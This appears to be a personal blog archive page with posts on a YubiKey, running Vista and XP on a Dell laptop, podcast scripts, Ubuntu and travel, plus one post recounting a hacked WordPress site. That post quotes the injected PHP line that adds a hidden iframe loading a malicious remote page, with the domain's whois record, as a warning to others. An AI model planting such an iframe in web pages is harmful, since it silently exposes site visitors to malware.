massyn.net

I’ve placed my order… My Yubikey is on the way. So what is the Yubikey? It’s a multi factor USB authentication device, that when plugged into your PC look just like a keyboard. Pressing the button will unleash a security 128bit AES one time password. How cool is that?

Here’s the even cooler bit. Yubico has released some C & Java code for coding your own backend system. The kind folks at Yubico is helping me understand the protocol so that I can help you bring a perl version of the backend server.

Yubico also offers an OpenID server. Even though it’s a paper thin little USB device, it’s got the ability to secure your digital life. I’m looking forward to getting mine in the mail, and start playing around with some code to interface with this little thing. Watch this space… I’ll be giving you a good overview to how the device goes through. I’ve already had a think about some potential “security issues” that may exist, so I’m very excited to see the little device, and put it through it’s paces.

You may be familiar with RSA’s SecureID.  There’s a few differences between them.  First of, SecureID displays a 6 digit number that has to be entered manually.  This is handy for PCs that do not have USB port, or older type PCs that just don’t support the specific USB Keyboard emulation that Yubikey gives you.  The big downside to SecureID is the cost.  It’s only big corporates that can afford it.   I’d love to get my hands on a SecureID token and write code for it - the chances of that happening is very slim.   With the Yubikey I’d be able to write my own code to interface with it.

Posted by mobile phone:
This post comes from my mobile phone. it takes forever to type, but does work.

It may not be Vista, I need to do some more checking… I’ve grown up with DOS, so I like the command line. I’m using AIX at work pretty much on a daily basis, I like coding perl, and I like working on the back end. So because I love all these things so much, I’ve built some scripts that help me publish my podcasts in a very short space of time.

Well, being a perl coder on the Unix platform mainly (and considering that perl is fairly cross platform), I used my encoder and uploader script on Vista…. Hmm…. The encoder script (pumping through lame) wasn’t a big deal. Sure I had to deal with the common / vs \ issues, etc, but nothing funny there. The upload script had a little snag. I use the curl utility to perform my upload, mainly because it’s cool, and because it supports resume on upload (ok, no, it doesn’t really, but with a loop in the script I can do it). For some crazy bizarre reason though, curl can not connect to my hosting provider. This is very strange… I have connectivity, I can ftp into my hosting account through DOS and FileZilla, but curl is a no go.

Strange one… I think I’ll test the same version of curl on an XP box, just to confirm it’s not a Vista problem.

Ok, ok… Let me come out and say it… Vista is not too bad…. There - I said it… It’s an ok consumer OS. At least my Rode Podcaster microphone is working now (did I tell you ??) yeah, it seems that www.rodepodcaster.com says it’s not supported, but rodemic.com has a firmware upgrade for it… Go figure! podify.net #009 was recorded with the Rode Podcaster within Adobe Audition 2.0 on my (wait for it!) Windows Vista powered Dell Lattitude 1525 laptop.

Time to go to bed… Cheers

Let’s talk about advertising in your podcast.

So last week I bought myself a very nice Dell Lattitude 1525. I pimped it out with a 250GB disk, 2GB of RAM, and I also upsized the CPU. I haven’t been a fan of Vista, but thought it’s probably time that I suck it up, and get with the times.

“Phil running vista?? That can’t be right??” - well, no, I would have preferred Linux, but let’s face it, although Linux is a very slick OS, for development I would prefer to work on Windows. Make no mistake, the first app I installed was VMWare, I pulled my Ubuntu development VM onto it immediatly.

The first thing I noticed about Vista, was that it’s different. Yeah yeah, ok, so I’m the old school guy who’s not used to the interface, but honestly, I felt like a fish out of water. Vista is different. The first thing I noticed was the performance… I would have expected this new laptop to churn through it, but Vista is slow. It took forever to bootup.

Apart from the slow performance, it worked reasonably well. After using Vista for a few days, I got more familiar with it, disabled the dodgy UAC (man it’s annoying to have to acknowledge every thing every couple of minutes!!).

So today I was setting up my desk, putting the laptop in it’s rightful place, hooked up my Rode Podcaster mic, and noticed vista complaining that the Rode did not install correctly. I head on over to Rode’s website, and found out with horror : The Rode Podcaster is not supported on Vista yet. (UPDATE - I found Vista firmware for the Rode over at rodemic.com - but now it’s gone (??) - at least I managed to upgrade my Rode, and it’s working now)

Come on! I just paid over a $1000 AUD for this laptop, the mic was about $250 AUD, and now I can’t use it? That’s it…. Let’s load XP…

You think that’s easy ?? Ha, Dell was so kind as to NOT include any XP drivers with the laptop. I also couldn’t boot up with my XP CD, because the laptop can not see the SATA disk. So I got nlite, and packaged my own custom XP version with the SATA driver in it. After a couple of hours of installation, I am now writing this blog entry on the same Vista-only machine, running Windows XP.

What is amazing though, is that Dell never gave me the option to choose XP. In hindsight, I probably should have chosen the 1520 (which does have an XP option). Fortunately the 1520 and the 1525 have similar chip sets, so I’m downloading the additional drivers for the 1520, and hopefully I can get my dual monitor working again properly. (UPDATE - Oh dear - I’m back on Vista.  It seems that the 1520 is NOT compatible with the 1525. Even though I managed to get XP running, the drivers were a mess)

So guys, when buying a Dell, be carefull.. Vista is not as cool as it seems. If you don’t need it, don’t buy it. It is slow - I don’t care what anyone says. This dual core laptop is now screamingly fast. And my Rode Podcaster mic is working nicely.

Come on Dell — don’t let Microsoft bully you into loading Vista only…

Let’s talk about MP3 encoding…

• http://www.mp3licensing.com
• http://winlame.sourceforge.net
• http://www.dors.de/razorlame/

Phil’s Encoder Tool

Ok, ok, I shouldn’t say this too loud, but in the interest of public awareness, I feel it is necessary to share with you what happened to my site(s).

On April 10th, 2008 I noticed something strange on my website. All the pages had a little extra block added to it, also when opening my website, I saw Firefox was opening links to another site. This was odd, at first I didn’t think too much about it, until I realized that this on every page.

I tried to log onto my Wordpress admin console, then I started seeing error message… It was obvious - the code changed, and it wasn’t good.

I logged onto my GoDaddy hosting account via FTP, and downloaded the “file in question”. Looking at it through notepad, I noticed it had an extra line added at the bottom… This was not standard…

<?php echo ‘<iframe src=”http://cdpuvbhfzz.com/dl/adv598.php” width=1 height=1></iframe>’; ?>

This was scary… I cleaned the page, uploaded it again, then Wordpress complained about another file. I soon discovered that every single php file on my hosting account had this line of code added.

This was a scary thought. I also found that every single html page had a similar link added. I still don’t know how these dirty hackers managed to get into my account. I immediately upgraded Wordpress & Podpress to the latest version, deleted all my themes and plugins.

Further investigation (for the technical minded)

The URL encoding isn’t very hard to crack. I determined that the link it’s downloading in the iframe is http://cdpuvbhfzz.com/dl/adv598.php — DO NOT CLICK THIS LINK.

The link downloads again some encoded content down to your PC. I haven’t done the deciphering of it yet, but I will soon.

As for the domain cdpuvbhfzz.com, it’s almost impossible to determine where it came from. It was registered through a Chinese website, named http://www.bizcn.com. I’m still waiting to hear from their support line if they’ll be taking this domain down, as it’s a serious breach of security. Here’s the whois information :-

Domain Name: CDPUVBHFZZ.COM
Registrar: BIZCN.COM, INC.
Whois Server: whois.bizcn.com
Referral URL: http://www.bizcn.com
Name Server: NS1.CHBDVRNFAG.COM
Name Server: NS2.CHBDVRNFAG.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 31-mar-2008
Creation Date: 31-mar-2008
Expiration Date: 31-mar-2009

All my pages are back to normal. I’ve had to write a script to clean the 10,000 odd files that live in various places on my hosting package.

It is very interesting… How did these guys get in ?? The only plausable explaination I can come up with is a known vulnerability in Wordpress or one of my plugins… GoDaddy does not give us access to the apache logs, so it’s very difficult to trace back how these !@#$#%^ got in…

So world, heads up… You might be next…. Update Wordpress, update your plugins…

UPDATE

Thanks to James for the comment he posted. I noticed that we both run coppermine from the GoDaddy hosting package, and it’s OLD. I’ve just found this thread on the Coppermine forum that explains the vulnerability. Upgrade your copy of Coppermine ASAP!!

UPDATE - 17 April 2008

Due to *popular* demand, I’m publishing the script I used to clean the mess.  The script is a bit flakey, but it works.  Run it at your own risk !!  Do also note - it is in Perl, and will only work if you have the Perl CGI bits available on your GoDaddy hosting package.

I have a Dell Latitude C610 - it’s old, it’s slow, but it gets the job done, considering I only use it for web surfing, email, remote shell & remote desktop.

Well tonight I decided to rip out the 40GB disk (because I don’t want to blow away my Win XP installation) and popped in the 10GB.  I got my Ubuntu 7.10 Server CD, and started loading it.  You may ask : Why Ubuntu Server? Well, for one, this machine will also be used for web development, so I want to have Apache, mySQL and Perl on it.  Second of all, I had Ubuntu Desktop 7.10 on it previously, but gnome just sucked all life out of this little machine.  With the server edition, you get a text only console, with the bare minimum stuff installed.

But I wanted a gui… so I found this article that explained how to setup icewm on Ubuntu, and it worked.  The only reason so I can run firefox, which in turn would be used to test the web development I’m doing.

And here’s the result… It works… And it’s fast.. (ok, relatively speaking )  Who says Linux can’t be sexy ?

Hey guys, so my trip to Switserland is over, I spent a week in the little town of Vevey, about an hour by train from Geneva.  It wasn’t as cold as I thought it would be, though moving from the Sydney summer to the Geneva winter does have a shock on the system.

The flight to Switserland was ok’ish.  Let’s be honest - flying for 20 hours isn’t a lot of fun.  The flight back to Bangkok was ok, but from Bangkok to Sydney was horrible.  The plane was an old 747, the seats were horrible, which made sleeping a pain.

Anyway, I’m back in Sydney, and it’s good to be home.  Jetlag is a pain… I woke up at 4AM this morning !!

In other news, Hester went to the doctor this morning, and we’re happy to report that everything is well with her and the baby.  The blood pressure is down, so no more risk for the pregnancy.  We’re all relieved to hear the good news.

Now it’s off to work…   I need to start preparing my podcasts… Will probably record them this weekend.  See ya!

In today’s show I’ll be sharing my experience with using VMWare as a platform for podcast generation.